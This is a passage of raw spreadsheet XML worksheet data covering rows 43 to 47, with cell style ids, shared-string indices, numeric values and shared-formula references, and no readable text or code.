      </c>
      <c r="AI43" s="78"/>
      <c r="AJ43" s="78"/>
      <c r="AK43" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL43" s="78"/>
      <c r="AM43" s="78"/>
      <c r="AN43" s="78"/>
      <c r="AO43" s="78"/>
      <c r="AP43" s="80"/>
      <c r="AQ43" s="80"/>
      <c r="AR43" s="80"/>
      <c r="AS43" s="80">
        <v>0.0</v>
      </c>
      <c r="AT43" s="80"/>
      <c r="AU43" s="80"/>
      <c r="AV43" s="80"/>
      <c r="AW43" s="80"/>
      <c r="AX43" s="80"/>
      <c r="AY43" s="80"/>
      <c r="AZ43" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA43" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB43" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC43" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD43" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE43" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF43" s="82"/>
      <c r="BG43" s="82"/>
      <c r="BH43" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI43" s="82"/>
      <c r="BJ43" s="82"/>
      <c r="BK43" s="82"/>
      <c r="BL43" s="82"/>
      <c r="BM43" s="83"/>
      <c r="BN43" s="83"/>
      <c r="BO43" s="83"/>
      <c r="BP43" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ43" s="83"/>
      <c r="BR43" s="83"/>
      <c r="BS43" s="83"/>
      <c r="BT43" s="83"/>
      <c r="BU43" s="83"/>
      <c r="BV43" s="83"/>
      <c r="BW43" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX43" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY43" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ43" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA43" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB43" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC43" s="85"/>
      <c r="CD43" s="85"/>
      <c r="CE43" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF43" s="85"/>
      <c r="CG43" s="85"/>
      <c r="CH43" s="85"/>
      <c r="CI43" s="85"/>
      <c r="CJ43" s="86"/>
      <c r="CK43" s="86"/>
      <c r="CL43" s="86"/>
      <c r="CM43" s="86">
        <v>0.0</v>
      </c>
      <c r="CN43" s="86"/>
      <c r="CO43" s="86"/>
      <c r="CP43" s="86"/>
      <c r="CQ43" s="86"/>
      <c r="CR43" s="86"/>
      <c r="CS43" s="86"/>
      <c r="CT43" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU43" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV43" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW43" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX43" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY43" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ43" s="88"/>
      <c r="DA43" s="88"/>
      <c r="DB43" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC43" s="88"/>
      <c r="DD43" s="88"/>
      <c r="DE43" s="88"/>
      <c r="DF43" s="88"/>
      <c r="DG43" s="89"/>
      <c r="DH43" s="89"/>
      <c r="DI43" s="89"/>
      <c r="DJ43" s="89">
        <v>0.0</v>
      </c>
      <c r="DK43" s="89"/>
      <c r="DL43" s="89"/>
      <c r="DM43" s="89"/>
      <c r="DN43" s="89"/>
      <c r="DO43" s="89"/>
      <c r="DP43" s="89"/>
      <c r="DQ43" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR43" s="91"/>
      <c r="DS43" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT43" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU43" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA43" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB43" s="74">
        <v>0.0</v>
      </c>
      <c r="EC43" s="74">
        <v>0.0</v>
      </c>
      <c r="ED43" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE43" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="44" ht="153.75" customHeight="1">
      <c r="B44" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C44" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D44" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E44" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F44" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G44" s="97" t="s">
        <v>537</v>
      </c>
      <c r="H44" s="72" t="s">
        <v>538</v>
      </c>
      <c r="I44" s="73" t="s">
        <v>551</v>
      </c>
      <c r="J44" s="73" t="s">
        <v>552</v>
      </c>
      <c r="K44" s="73" t="s">
        <v>553</v>
      </c>
      <c r="L44" s="74">
        <v>2.0</v>
      </c>
      <c r="M44" s="74">
        <v>1.0</v>
      </c>
      <c r="N44" s="74">
        <v>1.0</v>
      </c>
      <c r="O44" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P44" s="74">
        <v>1.0</v>
      </c>
      <c r="Q44" s="74">
        <v>0.0</v>
      </c>
      <c r="R44" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S44" s="76" t="s">
        <v>554</v>
      </c>
      <c r="T44" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U44" s="77" t="s">
        <v>528</v>
      </c>
      <c r="V44" s="76" t="s">
        <v>555</v>
      </c>
      <c r="W44" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X44" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y44" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z44" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA44" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB44" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC44" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD44" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE44" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF44" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG44" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH44" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI44" s="78"/>
      <c r="AJ44" s="78"/>
      <c r="AK44" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL44" s="78"/>
      <c r="AM44" s="78"/>
      <c r="AN44" s="78"/>
      <c r="AO44" s="78"/>
      <c r="AP44" s="80"/>
      <c r="AQ44" s="80"/>
      <c r="AR44" s="80"/>
      <c r="AS44" s="80">
        <v>0.0</v>
      </c>
      <c r="AT44" s="80"/>
      <c r="AU44" s="80"/>
      <c r="AV44" s="80"/>
      <c r="AW44" s="80"/>
      <c r="AX44" s="80"/>
      <c r="AY44" s="80"/>
      <c r="AZ44" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA44" s="82">
        <v>2100366.0</v>
      </c>
      <c r="BB44" s="82">
        <v>1.0</v>
      </c>
      <c r="BC44" s="82">
        <v>10.0</v>
      </c>
      <c r="BD44" s="79">
        <v>2100366.0</v>
      </c>
      <c r="BE44" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF44" s="83"/>
      <c r="BG44" s="83"/>
      <c r="BH44" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI44" s="83"/>
      <c r="BJ44" s="83"/>
      <c r="BK44" s="83"/>
      <c r="BL44" s="83"/>
      <c r="BM44" s="83"/>
      <c r="BN44" s="83"/>
      <c r="BO44" s="83"/>
      <c r="BP44" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ44" s="83"/>
      <c r="BR44" s="83"/>
      <c r="BS44" s="83"/>
      <c r="BT44" s="83"/>
      <c r="BU44" s="83"/>
      <c r="BV44" s="83"/>
      <c r="BW44" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX44" s="85">
        <v>2100366.0</v>
      </c>
      <c r="BY44" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ44" s="85">
        <v>10.0</v>
      </c>
      <c r="CA44" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB44" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC44" s="85"/>
      <c r="CD44" s="85"/>
      <c r="CE44" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF44" s="85"/>
      <c r="CG44" s="85"/>
      <c r="CH44" s="85"/>
      <c r="CI44" s="85"/>
      <c r="CJ44" s="86"/>
      <c r="CK44" s="86"/>
      <c r="CL44" s="86"/>
      <c r="CM44" s="86">
        <v>0.0</v>
      </c>
      <c r="CN44" s="86"/>
      <c r="CO44" s="86"/>
      <c r="CP44" s="86"/>
      <c r="CQ44" s="86"/>
      <c r="CR44" s="86"/>
      <c r="CS44" s="86"/>
      <c r="CT44" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU44" s="88" t="s">
        <v>556</v>
      </c>
      <c r="CV44" s="88">
        <v>6.0</v>
      </c>
      <c r="CW44" s="88">
        <v>38.0</v>
      </c>
      <c r="CX44" s="79" t="s">
        <v>557</v>
      </c>
      <c r="CY44" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ44" s="88"/>
      <c r="DA44" s="88"/>
      <c r="DB44" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC44" s="88"/>
      <c r="DD44" s="88"/>
      <c r="DE44" s="88"/>
      <c r="DF44" s="88"/>
      <c r="DG44" s="89"/>
      <c r="DH44" s="89"/>
      <c r="DI44" s="89"/>
      <c r="DJ44" s="89">
        <v>0.0</v>
      </c>
      <c r="DK44" s="89"/>
      <c r="DL44" s="89"/>
      <c r="DM44" s="89"/>
      <c r="DN44" s="89"/>
      <c r="DO44" s="89"/>
      <c r="DP44" s="89"/>
      <c r="DQ44" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR44" s="91"/>
      <c r="DS44" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT44" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU44" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB44" s="74">
        <v>3.0</v>
      </c>
      <c r="EC44" s="74">
        <v>0.0</v>
      </c>
      <c r="ED44" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE44" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="45" ht="153.75" customHeight="1">
      <c r="B45" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C45" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D45" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E45" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F45" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G45" s="97" t="s">
        <v>558</v>
      </c>
      <c r="H45" s="72" t="s">
        <v>559</v>
      </c>
      <c r="I45" s="73" t="s">
        <v>558</v>
      </c>
      <c r="J45" s="73" t="s">
        <v>560</v>
      </c>
      <c r="K45" s="73" t="s">
        <v>561</v>
      </c>
      <c r="L45" s="74">
        <v>5.0</v>
      </c>
      <c r="M45" s="74">
        <v>1.0</v>
      </c>
      <c r="N45" s="74">
        <v>1.0</v>
      </c>
      <c r="O45" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P45" s="74">
        <v>1.0</v>
      </c>
      <c r="Q45" s="74">
        <v>0.0</v>
      </c>
      <c r="R45" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S45" s="76" t="s">
        <v>562</v>
      </c>
      <c r="T45" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U45" s="77" t="s">
        <v>563</v>
      </c>
      <c r="V45" s="76" t="s">
        <v>564</v>
      </c>
      <c r="W45" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X45" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y45" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z45" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA45" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB45" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC45" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD45" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE45" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF45" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG45" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH45" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI45" s="78"/>
      <c r="AJ45" s="78"/>
      <c r="AK45" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL45" s="78"/>
      <c r="AM45" s="78"/>
      <c r="AN45" s="78"/>
      <c r="AO45" s="78"/>
      <c r="AP45" s="80"/>
      <c r="AQ45" s="80"/>
      <c r="AR45" s="80"/>
      <c r="AS45" s="80">
        <v>0.0</v>
      </c>
      <c r="AT45" s="80"/>
      <c r="AU45" s="80"/>
      <c r="AV45" s="80"/>
      <c r="AW45" s="80"/>
      <c r="AX45" s="80"/>
      <c r="AY45" s="80"/>
      <c r="AZ45" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA45" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB45" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC45" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD45" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE45" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF45" s="83"/>
      <c r="BG45" s="83"/>
      <c r="BH45" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI45" s="83"/>
      <c r="BJ45" s="83"/>
      <c r="BK45" s="83"/>
      <c r="BL45" s="83"/>
      <c r="BM45" s="83"/>
      <c r="BN45" s="83"/>
      <c r="BO45" s="83"/>
      <c r="BP45" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ45" s="83"/>
      <c r="BR45" s="83"/>
      <c r="BS45" s="83"/>
      <c r="BT45" s="83"/>
      <c r="BU45" s="83"/>
      <c r="BV45" s="83"/>
      <c r="BW45" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX45" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY45" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ45" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA45" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB45" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC45" s="85"/>
      <c r="CD45" s="85"/>
      <c r="CE45" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF45" s="85"/>
      <c r="CG45" s="85"/>
      <c r="CH45" s="85"/>
      <c r="CI45" s="85"/>
      <c r="CJ45" s="86"/>
      <c r="CK45" s="86"/>
      <c r="CL45" s="86"/>
      <c r="CM45" s="86">
        <v>0.0</v>
      </c>
      <c r="CN45" s="86"/>
      <c r="CO45" s="86"/>
      <c r="CP45" s="86"/>
      <c r="CQ45" s="86"/>
      <c r="CR45" s="86"/>
      <c r="CS45" s="86"/>
      <c r="CT45" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU45" s="88" t="s">
        <v>565</v>
      </c>
      <c r="CV45" s="88">
        <v>3.0</v>
      </c>
      <c r="CW45" s="88">
        <v>75.0</v>
      </c>
      <c r="CX45" s="79" t="s">
        <v>566</v>
      </c>
      <c r="CY45" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ45" s="88"/>
      <c r="DA45" s="88"/>
      <c r="DB45" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC45" s="88"/>
      <c r="DD45" s="88"/>
      <c r="DE45" s="88"/>
      <c r="DF45" s="88"/>
      <c r="DG45" s="89"/>
      <c r="DH45" s="89"/>
      <c r="DI45" s="89"/>
      <c r="DJ45" s="89">
        <v>0.0</v>
      </c>
      <c r="DK45" s="89"/>
      <c r="DL45" s="89"/>
      <c r="DM45" s="89"/>
      <c r="DN45" s="89"/>
      <c r="DO45" s="89"/>
      <c r="DP45" s="89"/>
      <c r="DQ45" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR45" s="91"/>
      <c r="DS45" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT45" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU45" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB45" s="74">
        <v>0.0</v>
      </c>
      <c r="EC45" s="74">
        <v>0.0</v>
      </c>
      <c r="ED45" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE45" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="46" ht="153.75" customHeight="1">
      <c r="B46" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C46" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D46" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E46" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F46" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G46" s="97" t="s">
        <v>537</v>
      </c>
      <c r="H46" s="72" t="s">
        <v>538</v>
      </c>
      <c r="I46" s="73" t="s">
        <v>567</v>
      </c>
      <c r="J46" s="73" t="s">
        <v>236</v>
      </c>
      <c r="K46" s="73" t="s">
        <v>568</v>
      </c>
      <c r="L46" s="74">
        <v>3.0</v>
      </c>
      <c r="M46" s="74">
        <v>1.0</v>
      </c>
      <c r="N46" s="74">
        <v>1.0</v>
      </c>
      <c r="O46" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P46" s="74">
        <v>1.0</v>
      </c>
      <c r="Q46" s="74">
        <v>0.0</v>
      </c>
      <c r="R46" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S46" s="76" t="s">
        <v>554</v>
      </c>
      <c r="T46" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U46" s="77" t="s">
        <v>569</v>
      </c>
      <c r="V46" s="76" t="s">
        <v>570</v>
      </c>
      <c r="W46" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X46" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y46" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z46" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA46" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB46" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC46" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD46" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE46" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF46" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG46" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH46" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI46" s="78"/>
      <c r="AJ46" s="78"/>
      <c r="AK46" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL46" s="78"/>
      <c r="AM46" s="78"/>
      <c r="AN46" s="78"/>
      <c r="AO46" s="78"/>
      <c r="AP46" s="80"/>
      <c r="AQ46" s="80"/>
      <c r="AR46" s="80"/>
      <c r="AS46" s="80">
        <v>0.0</v>
      </c>
      <c r="AT46" s="80"/>
      <c r="AU46" s="80"/>
      <c r="AV46" s="80"/>
      <c r="AW46" s="80"/>
      <c r="AX46" s="80"/>
      <c r="AY46" s="80"/>
      <c r="AZ46" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA46" s="82">
        <v>2100366.0</v>
      </c>
      <c r="BB46" s="82">
        <v>1.0</v>
      </c>
      <c r="BC46" s="82">
        <v>10.0</v>
      </c>
      <c r="BD46" s="79">
        <v>2100366.0</v>
      </c>
      <c r="BE46" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF46" s="83"/>
      <c r="BG46" s="83"/>
      <c r="BH46" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI46" s="83"/>
      <c r="BJ46" s="83"/>
      <c r="BK46" s="83"/>
      <c r="BL46" s="83"/>
      <c r="BM46" s="83"/>
      <c r="BN46" s="83"/>
      <c r="BO46" s="83"/>
      <c r="BP46" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ46" s="83"/>
      <c r="BR46" s="83"/>
      <c r="BS46" s="83"/>
      <c r="BT46" s="83"/>
      <c r="BU46" s="83"/>
      <c r="BV46" s="83"/>
      <c r="BW46" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX46" s="85">
        <v>2100366.0</v>
      </c>
      <c r="BY46" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ46" s="85">
        <v>10.0</v>
      </c>
      <c r="CA46" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB46" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC46" s="85"/>
      <c r="CD46" s="85"/>
      <c r="CE46" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF46" s="85"/>
      <c r="CG46" s="85"/>
      <c r="CH46" s="85"/>
      <c r="CI46" s="85"/>
      <c r="CJ46" s="86"/>
      <c r="CK46" s="86"/>
      <c r="CL46" s="86"/>
      <c r="CM46" s="86">
        <v>0.0</v>
      </c>
      <c r="CN46" s="86"/>
      <c r="CO46" s="86"/>
      <c r="CP46" s="86"/>
      <c r="CQ46" s="86"/>
      <c r="CR46" s="86"/>
      <c r="CS46" s="86"/>
      <c r="CT46" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU46" s="88" t="s">
        <v>556</v>
      </c>
      <c r="CV46" s="88">
        <v>6.0</v>
      </c>
      <c r="CW46" s="88">
        <v>30.0</v>
      </c>
      <c r="CX46" s="79" t="s">
        <v>557</v>
      </c>
      <c r="CY46" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ46" s="88"/>
      <c r="DA46" s="88"/>
      <c r="DB46" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC46" s="88"/>
      <c r="DD46" s="88"/>
      <c r="DE46" s="88"/>
      <c r="DF46" s="88"/>
      <c r="DG46" s="89"/>
      <c r="DH46" s="89"/>
      <c r="DI46" s="89"/>
      <c r="DJ46" s="89">
        <v>0.0</v>
      </c>
      <c r="DK46" s="89"/>
      <c r="DL46" s="89"/>
      <c r="DM46" s="89"/>
      <c r="DN46" s="89"/>
      <c r="DO46" s="89"/>
      <c r="DP46" s="89"/>
      <c r="DQ46" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR46" s="91"/>
      <c r="DS46" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT46" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU46" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB46" s="74">
        <v>3.0</v>
      </c>
      <c r="EC46" s="74">
        <v>0.0</v>
      </c>
      <c r="ED46" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE46" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="47" ht="153.75" customHeight="1">
      <c r="B47" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C47" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D47" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E47" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F47" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G47" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H47" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I47" s="73" t="s">
        <v>571</v>
      </c>
      <c r="J47" s="73" t="s">
        <v>572</v>
      </c>
      <c r="K47" s="73" t="s">
        <v>573</v>
      </c>
      <c r="L47" s="74">
        <v>2.0</v>
      </c>
      <c r="M47" s="74">
        <v>1.0</v>
      </c>
      <c r="N47" s="74">
        <v>1.0</v>
      </c>
      <c r="O47" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P47" s="74">
        <v>1.0</v>
      </c>
      <c r="Q47" s="74">
        <v>0.0</v>
      </c>
      <c r="R47" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S47" s="76" t="s">
        <v>574</v>
      </c>
      <c r="T47" s="76" t="s">
        <v>575</v>
      </c>
      <c r="U47" s="77" t="s">
        <v>576</v>
      </c>
      <c r="V47" s="76" t="s">
        <v>577</v>
      </c>
      <c r="W47" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X47" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y47" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z47" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA47" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB47" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC47" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD47" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE47" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF47" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG47" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH47" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI47" s="78"/>
      <c r="AJ47" s="78"/>
      <c r="AK47" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL47" s="78"/>
      <c r="AM47" s="78"/>
      <c r="AN47" s="78"/>
      <c r="AO47" s="78"/>
      <c r="AP47" s="80"/>
      <c r="AQ47" s="80"/>
      <c r="AR47" s="80"/>
      <c r="AS47" s="80">
        <v>0.0</v>
      </c>
      <c r="AT47" s="80"/>
      <c r="AU47" s="80"/>
      <c r="AV47" s="80"/>
      <c r="AW47" s="80"/>
      <c r="AX47" s="80"/>
      <c r="AY47" s="80"/>
      <c r="AZ47" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA47" s="82">
        <v>2100366.0</v>
      </c>
      <c r="BB47" s="82">
        <v>1.0</v>
      </c>
      <c r="BC47" s="82">
        <v>14.0</v>
      </c>
      <c r="BD47" s="79">
        <v>2100366.0</v>
      </c>
      <c r="BE47" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF47" s="83"/>
      <c r="BG47" s="83"/>
      <c r="BH47" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI47" s="83"/>
      <c r="BJ47" s="83"/>
      <c r="BK47" s="83"/>
      <c r="BL47" s="83"/>
      <c r="BM47" s="83"/>
      <c r="BN47" s="83"/>
      <c r="BO47" s="83"/>
      <c r="BP47" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ47" s="83"/>
      <c r="BR47" s="83"/>
      <c r="BS47" s="83"/>
      <c r="BT47" s="83"/>
      <c r="BU47" s="83"/>
      <c r="BV47" s="83"/>
      <c r="BW47" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX47" s="85">
        <v>2100366.0</v>
      </c>
      <c r="BY47" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ47" s="85">
        <v>14.0</v>
      </c>
      <c r="CA47" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB47" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC47" s="85"/>
      <c r="CD47" s="85"/>
      <c r="CE47" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF47" s="85"/>
      <c r="CG47" s="85"/>
      <c r="CH47" s="85"/>
      <c r="CI47" s="85"/>
      <c r="CJ47" s="86"/>
      <c r="CK47" s="86"/>
      <c r="CL47" s="86"/>
      <c r="CM47" s="86">
        <v>0.0</v>
      </c>
      <c r="CN47" s="86"/>
      <c r="CO47" s="86"/>
      <c r="CP47" s="86"/>
      <c r="CQ47" s="86"/>
      <c r="CR47" s="86"/>
